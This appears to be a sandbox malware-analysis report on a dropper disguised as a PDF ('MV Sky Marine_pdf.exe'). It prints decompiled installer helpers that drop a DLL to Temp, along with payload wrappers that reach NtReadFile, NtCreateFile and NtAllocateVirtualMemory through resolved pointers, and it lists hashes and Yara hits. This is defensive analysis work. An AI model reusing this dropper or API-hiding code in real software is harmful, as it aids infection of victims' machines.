                                                                                                  • Opcode Fuzzy Hash: a964d3017e93623f834dae234c1993fbf6a141eaae921d3b3dbfe0fce282430c
                                                                                                  • Instruction Fuzzy Hash: 2701F7364041149BE308CF5CCD446ECB7F9DB483E1B45421AE919972B4EBB0EA14CB90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                                                                                  				int _t5;
                                                                                                  				long _t7;
                                                                                                  				struct _OVERLAPPED* _t11;
                                                                                                  				intOrPtr* _t15;
                                                                                                  				void* _t17;
                                                                                                  				int _t21;
                                                                                                  
                                                                                                  				_t15 = __esi;
                                                                                                  				_t11 = __ebx;
                                                                                                  				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
                                                                                                  					_t7 = lstrlenA(E00402A29(0x11));
                                                                                                  				} else {
                                                                                                  					E00402A0C(1);
                                                                                                  					 *0x40a030 = __al;
                                                                                                  				}
                                                                                                  				if( *_t15 == _t11) {
                                                                                                  					L8:
                                                                                                  					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                                                  				} else {
                                                                                                  					_t5 = WriteFile(E00405C9B(_t17 + 8, _t15), "C:\Users\alfons\AppData\Local\Temp\nssBDFE.tmp\lckp0.dll", _t7, _t17 + 8, _t11);
                                                                                                  					_t21 = _t5;
                                                                                                  					if(_t21 == 0) {
                                                                                                  						goto L8;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				 *0x7a2828 =  *0x7a2828 +  *((intOrPtr*)(_t17 - 4));
                                                                                                  				return 0;
                                                                                                  			}

                                                                                                  Line addresses: 0x004024f1, 0x004024f1, 0x004024f4, 0x0040250f, 0x004024f6, 0x004024f8, 0x004024fd, 0x00402504, 0x00402516, 0x0040268f, 0x0040268f, 0x0040251c, 0x0040252e, 0x004015a6, 0x004015a8, 0x00000000, 0x004015ae, 0x004015a8, 0x004028c1, 0x004028cd

                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                                                                                                  • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp\lckp0.dll,00000000,?,?,00000000,00000011), ref: 0040252E
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\nssBDFE.tmp\lckp0.dll, xrefs: 004024FD, 00402522
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: FileWritelstrlen
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nssBDFE.tmp\lckp0.dll
                                                                                                  • API String ID: 427699356-2148799638
                                                                                                  • Opcode ID: 06c53b8ef1b7de2ca7bfd2e1cdeba514b9d01c2d5126b15a1f40b5802bcec65d
                                                                                                  • Instruction ID: e5b3206c06febe055580dfe5a6a88489a342fcfa0738d480186024668fc2dcdb
                                                                                                  • Opcode Fuzzy Hash: 06c53b8ef1b7de2ca7bfd2e1cdeba514b9d01c2d5126b15a1f40b5802bcec65d
                                                                                                  • Instruction Fuzzy Hash: 4BF0E272A15244BFDB10EFA49E49AEF3668DB40348F20043BB141B51C2D6FC4940876E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405584(CHAR* _a4) {
                                                                                                  				struct _PROCESS_INFORMATION _v20;
                                                                                                  				int _t7;
                                                                                                  
                                                                                                  				0x7a0da8->cb = 0x44;
                                                                                                  				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x7a0da8,  &_v20);
                                                                                                  				if(_t7 != 0) {
                                                                                                  					CloseHandle(_v20.hThread);
                                                                                                  					return _v20.hProcess;
                                                                                                  				}
                                                                                                  				return _t7;
                                                                                                  			}

                                                                                                  Line addresses: 0x0040558d, 0x004055a9, 0x004055b1, 0x004055b6, 0x00000000, 0x004055bc, 0x004055c0

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • Error launching installer, xrefs: 00405597
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                  • String ID: Error launching installer
                                                                                                  • API String ID: 3712363035-66219284
                                                                                                  • Opcode ID: 287ba7aed4c1d7fc8deb6dbb6ca57f606f8b60309fe5b4e813647c830d658d7f
                                                                                                  • Instruction ID: 1d0910285d5887e7f1af43bbbb9e1ce14b205e0bf24957ac02617a6088e78187
                                                                                                  • Opcode Fuzzy Hash: 287ba7aed4c1d7fc8deb6dbb6ca57f606f8b60309fe5b4e813647c830d658d7f
                                                                                                  • Instruction Fuzzy Hash: 8AE0ECB5A00209BFDB409FA4DD0996B7BBDEF40305B008921BD11F2250E778E9108AA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004036E2() {
                                                                                                  				void* _t2;
                                                                                                  				void* _t3;
                                                                                                  				void* _t6;
                                                                                                  				void* _t8;
                                                                                                  
                                                                                                  				_t8 =  *0x79dd5c;
                                                                                                  				_t3 = E004036C7(_t2, 0);
                                                                                                  				if(_t8 != 0) {
                                                                                                  					do {
                                                                                                  						_t6 = _t8;
                                                                                                  						_t8 =  *_t8;
                                                                                                  						FreeLibrary( *(_t6 + 8));
                                                                                                  						_t3 = GlobalFree(_t6);
                                                                                                  					} while (_t8 != 0);
                                                                                                  				}
                                                                                                  				 *0x79dd5c =  *0x79dd5c & 0x00000000;
                                                                                                  				return _t3;
                                                                                                  			}







                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,7519F560,004036B9,?,004034AB,00000020), ref: 004036FC
                                                                                                  • GlobalFree.KERNEL32 ref: 00403703
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004036F4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: Free$GlobalLibrary
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                  • API String ID: 1100898210-823278215
                                                                                                  • Opcode ID: c68695f27b54780de7632c9380ae7eb76e32f0608264f660e5d8af2826bde110
                                                                                                  • Instruction ID: 1039b9d4bfae997efe3864f43f16b70b74eeb1193bc847168fd24653c8968501
                                                                                                  • Opcode Fuzzy Hash: c68695f27b54780de7632c9380ae7eb76e32f0608264f660e5d8af2826bde110
                                                                                                  • Instruction Fuzzy Hash: 59E08C32910020ABC6311F49A90475A7B7C6B44B22F018427E900772A087786C428BC8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0040585E(char* _a4) {
                                                                                                  				char* _t3;
                                                                                                  				char* _t5;

                                                                                                  				// Split a path at its last backslash: the separator is overwritten with NUL so that
                                                                                                  				// _a4 keeps the directory part, and a pointer to the file-name part is returned.
                                                                                                  				// If the string contains no backslash, its first character is cleared instead.
                                                                                                  				_t5 = _a4;
                                                                                                  				_t3 =  &(_t5[lstrlenA(_t5)]);          // start at the terminating NUL
                                                                                                  				while( *_t3 != 0x5c) {                 // 0x5c is '\\'
                                                                                                  					_t3 = CharPrevA(_t5, _t3);         // step back one (possibly multi-byte) character
                                                                                                  					if(_t3 > _t5) {
                                                                                                  						continue;
                                                                                                  					}
                                                                                                  					break;                             // reached the start of the string
                                                                                                  				}
                                                                                                  				 *_t3 =  *_t3 & 0x00000000;            // terminate the directory part
                                                                                                  				return  &(_t3[1]);                     // file-name part begins after the separator
                                                                                                  			}





                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402D11,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MV Sky Marine_pdf.exe,C:\Users\user\Desktop\MV Sky Marine_pdf.exe,80000000,00000003), ref: 00405864
                                                                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D11,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MV Sky Marine_pdf.exe,C:\Users\user\Desktop\MV Sky Marine_pdf.exe,80000000,00000003), ref: 00405872
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: CharPrevlstrlen
                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                  • API String ID: 2709904686-1246513382
                                                                                                  • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                                  • Instruction ID: db814575930c951769e22c80c061cd1c2617a14d9c8a92b1c82cb0a4a3e1c245
                                                                                                  • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                                  • Instruction Fuzzy Hash: 7ED0C763509D705EE30372259C04B9F7A48DF16705F098866F580F6191C27C5C514FAD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 58%
                                                                                                  			E10001280() {
                                                                                                  				signed int _t4;

                                                                                                  				system("cls");          // clear the console through the shell
                                                                                                  				E10001330(_t4);         // subcall: per the API trace it issues another system() and several _printf calls (_t4 is passed uninitialised in this decompilation)
                                                                                                  				__imp___getch();        // wait for a keypress (import thunk for _getch)
                                                                                                  				return 0;
                                                                                                  			}




                                                                                                  APIs
                                                                                                  • system.MSVCRT ref: 10001285
                                                                                                    • Part of subcall function 10001330: system.MSVCRT ref: 10001339
                                                                                                    • Part of subcall function 10001330: _printf.MSPDB140-MSVCRT ref: 10001344
                                                                                                    • Part of subcall function 10001330: _printf.MSPDB140-MSVCRT ref: 1000134E
                                                                                                    • Part of subcall function 10001330: _printf.MSPDB140-MSVCRT ref: 10001358
                                                                                                    • Part of subcall function 10001330: _printf.MSPDB140-MSVCRT ref: 10001362
                                                                                                    • Part of subcall function 10001330: _printf.MSPDB140-MSVCRT ref: 1000136C
                                                                                                  • _getch.MSVCRT ref: 10001293
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: _printf$system$_getch
                                                                                                  • String ID: cls
                                                                                                  • API String ID: 668655315-3046418502
                                                                                                  • Opcode ID: a4bfbed6a10874f666494872391924de3c32b4d11413416a0fdb8fecb89270a2
                                                                                                  • Instruction ID: 12fc2e0169d9cef55c7a7abd20c98f658375cc717d68ceb285f7eb1d9efaba96
                                                                                                  • Opcode Fuzzy Hash: a4bfbed6a10874f666494872391924de3c32b4d11413416a0fdb8fecb89270a2
                                                                                                  • Instruction Fuzzy Hash: 8BB01270811110CBF605A7B04C4D04F3690DF082C27004021F102C001FDF10D228D637
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405970(CHAR* _a4, CHAR* _a8) {
                                                                                                  				int _t10;
                                                                                                  				int _t15;
                                                                                                  				CHAR* _t16;

                                                                                                  				// Case-insensitive substring search: returns a pointer to the first position in _a4
                                                                                                  				// at which _a8 matches, or 0 if there is none. As decompiled, each probe cuts the
                                                                                                  				// candidate to the needle's length in place and does not restore the byte.
                                                                                                  				_t15 = lstrlenA(_a8);
                                                                                                  				_t16 = _a4;
                                                                                                  				while(lstrlenA(_t16) >= _t15) {
                                                                                                  					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;   // truncate candidate to needle length
                                                                                                  					_t10 = lstrcmpiA(_t16, _a8);
                                                                                                  					if(_t10 == 0) {
                                                                                                  						return _t16;
                                                                                                  					}
                                                                                                  					_t16 = CharNextA(_t16);                           // advance one character (DBCS-aware)
                                                                                                  				}
                                                                                                  				return 0;
                                                                                                  			}






                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405B7E,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405977
                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405B7E,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405990
                                                                                                  • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 0040599E
                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405B7E,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004059A7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                  • String ID:
                                                                                                  • API String ID: 190613189-0
                                                                                                  • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                                  • Instruction ID: f10c3429608c76b922a9aabfe128638ad90a9d7869a90c391399b90e50ce6b80
                                                                                                  • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                                  • Instruction Fuzzy Hash: 18F02776209D51EED3025B248C04E2B6B94EF92364F18043AF480F2180C33998129BBB
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Executed Functions

                                                                                                  C-Code - Quality: 37%
                                                                                                  			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                  				intOrPtr _t13;      // declaration added: used below but omitted by the decompiler
                                                                                                  				char* _t6;          // declaration added: likewise
                                                                                                  				char* _t12;         // declaration added: likewise
                                                                                                  				void* _t18;
                                                                                                  				void* _t27;
                                                                                                  				intOrPtr* _t28;

                                                                                                  				// _a4 is a context structure. The slot at +0xc48 is handed to E00418DB0 together with
                                                                                                  				// the index 0x2a and is then used as a function pointer; the call through it is what
                                                                                                  				// the API trace records as NtReadFile (ref: 004182A5), i.e. the API is reached through
                                                                                                  				// a resolved pointer rather than a direct import.
                                                                                                  				_t13 = _a4;
                                                                                                  				_t28 = _a4 + 0xc48;
                                                                                                  				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                                  				_t6 =  &_a32; // 0x413d42
                                                                                                  				_t12 =  &_a8; // 0x413d42
                                                                                                  				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                                                  				return _t18;
                                                                                                  			}






                                                                                                  APIs
                                                                                                  • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileRead
                                                                                                  • String ID: B=A$B=A
                                                                                                  • API String ID: 2738559852-2767357659
                                                                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                  • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                  • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00409B10(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                                  				char* _v8;
                                                                                                  				struct _EXCEPTION_RECORD _v12;
                                                                                                  				struct _OBJDIR_INFORMATION _v16;
                                                                                                  				char _v536;
                                                                                                  				void* _t15;
                                                                                                  				struct _OBJDIR_INFORMATION _t17;
                                                                                                  				struct _OBJDIR_INFORMATION _t18;
                                                                                                  				void* _t30;
                                                                                                  				void* _t31;
                                                                                                  				void* _t32;
                                                                                                  
                                                                                                  				_v8 =  &_v536;
                                                                                                  				_t15 = E0041AB40( &_v12, 0x104, _a8);
                                                                                                  				_t31 = _t30 + 0xc;
                                                                                                  				if(_t15 != 0) {
                                                                                                  					_t17 = E0041AF60(__eflags, _v8);
                                                                                                  					_t32 = _t31 + 4;
                                                                                                  					__eflags = _t17;
                                                                                                  					if(_t17 != 0) {
                                                                                                  						E0041B1E0( &_v12, 0);
                                                                                                  						_t32 = _t32 + 8;
                                                                                                  					}
                                                                                                  					_t18 = E004192F0(_v8);
                                                                                                  					_v16 = _t18;
                                                                                                  					__eflags = _t18;
                                                                                                  					if(_t18 == 0) {
                                                                                                  						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                                  						return _v16;
                                                                                                  					}
                                                                                                  					return _t18;
                                                                                                  				} else {
                                                                                                  					return _t15;
                                                                                                  				}
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Load
                                                                                                  • String ID:
                                                                                                  • API String ID: 2234796835-0
                                                                                                  • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                  • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                                                                  • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                  • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                  				long _t21;
                                                                                                  				void* _t31;
                                                                                                  
                                                                                                  				_t3 = _a4 + 0xc40; // 0xc40
                                                                                                  				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                  				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                  				return _t21;
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 823142352-0
                                                                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                  • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                  • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0041838D(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                  				long _t14;
                                                                                                  
                                                                                                  				_t10 = _a4;
                                                                                                  				_t3 = _t10 + 0xc60; // 0xca0
                                                                                                  				E00418DB0(0x8b559b69, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                                  				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                  				return _t14;
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2167126740-0
                                                                                                  • Opcode ID: dc7c72dba20dd52ffa0ba4e1a960f4ea472dab85c90565b053b3ec8599c89bed
                                                                                                  • Instruction ID: a8d7b7a700ba5d25d00f605317719c845479ebe15d8640263165d81c601a2403
                                                                                                  • Opcode Fuzzy Hash: dc7c72dba20dd52ffa0ba4e1a960f4ea472dab85c90565b053b3ec8599c89bed
                                                                                                  • Instruction Fuzzy Hash: 50F01CB6204108AFDB14DF89DC80EE777ADAF88354F158149BA4897241C634E811CBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                  				long _t14;
                                                                                                  				void* _t21;
                                                                                                  
                                                                                                  				_t3 = _a4 + 0xc60; // 0xca0
                                                                                                  				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                                  				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                  				return _t14;
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2167126740-0
                                                                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                  • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                  • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004182E0(intOrPtr _a4, void* _a8) {
                                                                                                  				long _t8;
                                                                                                  				void* _t11;
                                                                                                  
                                                                                                  				_t5 = _a4;
                                                                                                  				_t2 = _t5 + 0x10; // 0x300
                                                                                                  				_t3 = _t5 + 0xc50; // 0x409733
                                                                                                  				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                                  				_t8 = NtClose(_a8); // executed
                                                                                                  				return _t8;
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close
                                                                                                  • String ID:
                                                                                                  • API String ID: 3535843008-0
                                                                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
